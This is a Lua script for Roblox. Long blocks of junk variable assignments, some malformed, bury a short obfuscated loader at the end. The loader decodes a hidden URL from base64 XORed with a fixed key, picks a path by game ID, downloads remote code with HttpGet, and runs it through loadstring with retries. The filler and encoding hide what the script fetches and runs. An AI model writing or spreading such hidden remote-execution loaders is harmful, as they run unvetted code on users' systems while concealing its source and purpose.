local _=false;local __=nil; local ___=true                    local ____=0; local _=nil;  local __=falselocal ___=nil;      local ____=nillocal _=true; local __=0;                       local ___=0;  local ____=trulocal _=false;                    local __=nil; local ___=truelocal ____=0; local _=nil;        local __=falselocal ___=nil;local ____=nil
local _=true; local __=0;   local ___=0;                      local ____=trulocal _=false;local __=nil; local ___=true      local ____=0; local _=nil;  local __=false                    local ___=nil;local ____=nillocal _=true;                     local __=0;   local ___=0;  local ____=trulocal _=false;      local __=nil; local ___=truelocal ____=0;
local _=nil;                              local __=false      local ___=nil;                                                              local ____=nil                                                local _=true;                                   local __=0;                                                   local ___=0;                              local ____=tru
local _=false;                            local __=nil;       local ___=true                                                              local ____=0;                                                 local _=nil;                                    local __=false                                                local ___=nil;                            local ____=nil
local _=true; local __=0;   local ___=0;                      local ____=trulocal _=false;local __=nil;                                   local ___=true                                                local ____=0;                                   local _=nil;  local __=falselocal ___=nil;                    local ____=nillocal _=true; local __=0;
local ___=0;  local ____=trulocal _=false;                    local __=nil; local ___=truelocal ____=0;                                   local _=nil;                                                  local __=false                                  local ___=nil;local ____=nillocal _=true;                     local __=0;   local ___=0;  local ____=tru
local _=false;                            local __=nil;       local ___=true                                                              local ____=0;                                                 local _=nil;                                    local __=false                                                local ___=nil;              local ____=nil
local _=true;                             local __=0;         local ___=0;                                                                local ____=tru                                                local _=false;                                  local __=nil;                                                 local ___=true              local ____=0;
local _=nil;  local __=falselocal ___=nil;                    local ____=nillocal _=true; local __=0;   local ___=0;                      local ____=tru                                                local _=false;                                  local __=nil; local ___=truelocal ____=0; local _=nil;        local __=false                            local ___=nil;
local ____=nillocal _=true; local __=0;                       local ___=0;  local ____=trulocal _=false;local __=nil;                     local ___=true                                                local ____=0;                                   local _=nil;  local __=falselocal ___=nil;local ____=nil      local _=true;                             local __=0;

local ___=0;                              local ____=tru      local _=false;                            local __=nil;       local ___=truelocal ____=0; local _=nil;        local __=false              local ___=nil;      local ____=nillocal _=true; local __=0;   local ___=0;        local ____=trulocal _=false;local __=nil;                                   local ___=truelocal ____=0; local _=nil;                      local __=falselocal ___=nil;                    local ____=nil
local _=true;                             local __=0;         local ___=0;                              local ____=tru      local _=false;local __=nil; local ___=true      local ____=0;               local _=nil;        local __=falselocal ___=nil;local ____=nillocal _=true;       local __=0;   local ___=0;  local ____=tru                                  local _=false;local __=nil; local ___=true                    local ____=0; local _=nil;                      local __=false
local ___=nil;                            local ____=nil      local _=true; local __=0;                 local ___=0;                      local ____=tru                    local _=false;              local __=nil;       local ___=true                                                local ____=0;                             local _=nil;        local __=false                                                local ___=nil;                            local ____=nil      local _=true;
local __=0;                               local ___=0;        local ____=trulocal _=false;              local __=nil;                     local ___=true                    local ____=0;               local _=nil;        local __=false                                                local ___=nil;                            local ____=nil      local _=true;                                                 local __=0;                               local ___=0;        local ____=tru
local _=false;                            local __=nil;       local ___=true              local ____=0; local _=nil;                      local __=false                    local ___=nil;              local ____=nil      local _=true; local __=0;   local ___=0;                      local ____=trulocal _=false;local __=nil;                                   local ___=truelocal ____=0;                     local _=nil;  local __=falselocal ___=nil;local ____=nil      local _=true;
local __=0;                               local ___=0;        local ____=tru              local _=false;local __=nil;                     local ___=true                    local ____=0;               local _=nil;        local __=falselocal ___=nil;local ____=nil                    local _=true; local __=0;   local ___=0;                                    local ____=trulocal _=false;                    local __=nil; local ___=truelocal ____=0; local _=nil;        local __=false
local ___=nil;                            local ____=nil      local _=true;                             local __=0;                       local ___=0;                                    local ____=tru                    local _=false;                                                local __=nil;               local ___=true                                                              local ____=0;       local _=nil;                              local __=false      local ___=nil;
local ____=nil                            local _=true;       local __=0;                               local ___=0;                      local ____=tru                                  local _=false;                    local __=nil;                                                 local ___=true              local ____=0;                                                               local _=nil;        local __=false                            local ___=nil;      local ____=nil
local _=true; local __=0;   local ___=0;                      local ____=tru                            local _=false;      local __=nil; local ___=truelocal ____=0;                     local _=nil;                      local __=falselocal ___=nil;local ____=nillocal _=true;       local __=0;                               local ___=0;        local ____=trulocal _=false;local __=nil;                     local ___=true                            local ____=0;       local _=nil;  local __=falselocal ___=nil;local ____=nil
local _=true; local __=0;   local ___=0;                      local ____=tru                            local _=false;      local __=nil; local ___=truelocal ____=0;                     local _=nil;                      local __=falselocal ___=nil;local ____=nillocal _=true;       local __=0;                               local ___=0;        local ____=trulocal _=false;local __=nil;                     local ___=true                            local ____=0;       local _=nil;  local __=falselocal ___=nil;local ____=nil

local _=true;                             local __=0;         local ___=0;                              local ____=tru      local _=false;local __=nil; local ___=true
local ____=0;                             local _=nil;        local __=false                            local ___=nil;      local ____=nillocal _=true; local __=0;
local ___=0;                              local ____=tru      local _=false;                            local __=nil;       local ___=true                            local ____=0;
local _=nil;                              local __=false      local ___=nil;                            local ____=nil      local _=true;                             local __=0;
local ___=0;  local ____=trulocal _=false;local __=nil;       local ___=true                            local ____=0;       local _=nil;  local __=falselocal ___=nil;
local ____=nillocal _=true; local __=0;   local ___=0;        local ____=tru                            local _=false;      local __=nil; local ___=truelocal ____=0;
local _=nil;                              local __=false      local ___=nil;                            local ____=nil      local _=true;                             local __=0;
local ___=0;                              local ____=tru      local _=false;                            local __=nil;       local ___=true                            local ____=0;
local _=nil;                              local __=false      local ___=nil;local ____=nillocal _=true;                     local __=0;   local ___=0;  local ____=tru
local _=false;                            local __=nil;       local ___=truelocal ____=0; local _=nil;                      local __=falselocal ___=nil;local ____=nil

local a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"local b={0x4C,0x55,0x41,0x52,0x4F,0x43,0x4B,0x53}local function c(d)local e=d:gsub("[^"..a.."=]","")while#e%4~=0 do e=e.."="end;local f={}for g=1,#e,4 do local h=(a:find(e:sub(g,g),1,true)or 1)-1;local i=(a:find(e:sub(g+1,g+1),1,true)or 1)-1;local j,k=e:sub(g+2,g+2),e:sub(g+3,g+3)local l=j~="="and(a:find(j,1,true)or 1)-1 or 0;local m=k~="="and(a:find(k,1,true)or 1)-1 or 0;local n=h*0x40000+i*0x1000+l*0x40+m;f[#f+1]=string.char(math.floor(n/0x10000)%0x100)if j~="="then f[#f+1]=string.char(math.floor(n/0x100)%0x100)end;if k~="="then f[#f+1]=string.char(n%0x100)end end;local o=table.concat(f)local p={}for g=1,#o do p[g]=string.char(bit32.bxor(string.byte(o,g),b[(g-1)%#b+1]))end;return table.concat(p)end;local q=c("JCE1Ijx5ZHw+NDZ8KCo/Ozk3NCEqMSg8IiEkPDttKDwheiszJCZ6YH5gbjAqNz82Png0PCY1LiE/NC1/JzYpfD4wJyFgKy4yKCZuPy4qJXw=")local r={[7709344486]=c("PzYzOz83OHw8JyghIC0nOiowbz46Ig==")}task.spawn(function()local s=r[game.GameId]if not s then warn("[SS] no entry for "..game.GameId)return end;local t=0;repeat t=t+1;local u,o=pcall(game.HttpGet,game,q..s,true)if u and type(o)=="string"and#o>0 then local v,w=loadstring(o)if not v then warn("[SS] parse: "..tostring(w))return end;local x,y=pcall(v)if not x then warn("[SS] exec: "..tostring(y))end;return end;task.wait(1.5*t)until t>=5;warn("[SS] fetch failed")end)
